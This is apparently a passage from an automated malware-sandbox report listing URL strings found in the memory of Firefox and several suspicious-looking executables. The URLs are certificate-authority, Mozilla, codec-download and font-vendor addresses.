Source: firefox.exe, 00000033.00000003.2987250802.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-aarch64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zi
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-arm-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86_64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-linux32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-linux64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2.zip
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000033.00000003.2827138310.0000026F4EC34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp, 7FEF50EB1C89E58D7202896295BED2C7C56D1C99.51.dr	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: 7FEF50EB1C89E58D7202896295BED2C7C56D1C99.51.dr	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zipstrongly-
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F688000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000033.00000003.2821020703.0000026F4CBA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2899348946.0000026F4CBA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.orgP
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821020703.0000026F4CBA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000033.00000003.2987250802.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 00000033.00000003.2994904807.0000026F5DBE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000033.00000003.2900531454.0000026F4BC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000033.00000003.2640276526.0000026F4F8BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000033.00000003.2900531454.0000026F4BC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.htmlget
Source: firefox.exe, 00000033.00000003.2900531454.0000026F4BC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000033.00000003.2900531454.0000026F4BC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000031.00000002.4780134384.00000203453BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.comh
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000031.00000002.4747190844.000002034477E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000033.00000003.2692746712.0000026F49D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000031.00000002.4747190844.000002034475B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-timesp
Source: firefox.exe, 00000031.00000002.4747190844.000002034477E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000031.00000002.4747190844.000002034475B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2692746712.0000026F49D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 00000031.00000002.4747190844.000002034477E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000031.00000002.4727131464.0000020338F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: http://fb.me/use-check-prop-types
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: http://fb.me/use-check-prop-typesG
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://fontfabrik.com
Source: MPGPH131.exe, 00000007.00000002.2125757096.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.cP
Source: firefox.exe, 00000033.00000003.2958399809.0000026F5ADC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2953491552.0000026F5ADC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000031.00000003.2708574200.000002060003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4780134384.0000020345388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2698258724.0000020345388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2525570879.0000026F4E58C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2519671221.0000026F4E7F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2831493811.0000026F4EA4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2624873318.0000026F4E57C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2601550860.0000026F4E7A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2811962936.0000026F51AF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832026774.0000026F4E7F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2831570428.0000026F4E57D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2940411525.0000026F4E7F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2932402504.0000026F4C3A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2538704269.0000026F51B35000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2524058318.0000026F4C3D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2922522219.0000026F4E7F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2634863693.0000026F51AF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2624512490.0000026F4E5C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2833180698.0000026F4E5C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2525570879.0000026F4E57C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2957224507.0000026F5B273000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000033.00000003.2987250802.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000033.00000003.2994904807.0000026F5DBE7000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821020703.0000026F4CBA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F98000.00000040.00000001.01000000.00000009.sdmp, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000000.2273225465.00000000010BD000.00000080.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000000.2423152091.0000000000C5D000.00000080.00000001.01000000.00000010.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B38000.00000040.00000001.01000000.00000010.sdmp, PXBvYMcLF9IUsaGl9axr.exe.2.dr, explorhe.exe.15.dr	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F98000.00000040.00000001.01000000.00000009.sdmp, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000000.2273225465.00000000010BD000.00000080.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000000.2423152091.0000000000C5D000.00000080.00000001.01000000.00000010.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B38000.00000040.00000001.01000000.00000010.sdmp, PXBvYMcLF9IUsaGl9axr.exe.2.dr, explorhe.exe.15.dr	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F98000.00000040.00000001.01000000.00000009.sdmp, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000000.2273225465.00000000010BD000.00000080.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000000.2423152091.0000000000C5D000.00000080.00000001.01000000.00000010.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B38000.00000040.00000001.01000000.00000010.sdmp, PXBvYMcLF9IUsaGl9axr.exe.2.dr, explorhe.exe.15.dr	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 00000033.00000003.2994904807.0000026F5DBE7000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: firefox.exe, 00000033.00000003.2991330163.0000026F5DABB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: http://stackoverflow.com/questions/30030031)
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: http://support.google.com/accounts/answer/151657?hl=en-GB
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: firefox.exe, 00000031.00000002.4827029907.0000020345F22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: firefox.exe, 00000031.00000002.4827029907.0000020345F22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: firefox.exe, 00000031.00000002.4827029907.0000020345F22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.fonts.com
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: firefox.exe, 00000033.00000003.2816659490.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675052698.0000026F4CB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2900419944.0000026F4CB66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2821020703.0000026F4CBA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: firefox.exe, 00000033.00000003.2641557959.0000026F4E843000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640774157.0000026F4F66C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2673594685.0000026F4F68C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640735301.0000026F4F683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2794998946.0000026F4F68C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F66C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2637111571.0000026F518C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000031.00000003.2695551101.0000020344AB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4758162324.0000020344AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul4e
Source: firefox.exe, 00000031.00000003.2695551101.0000020344AB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4758162324.0000020344AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulQj
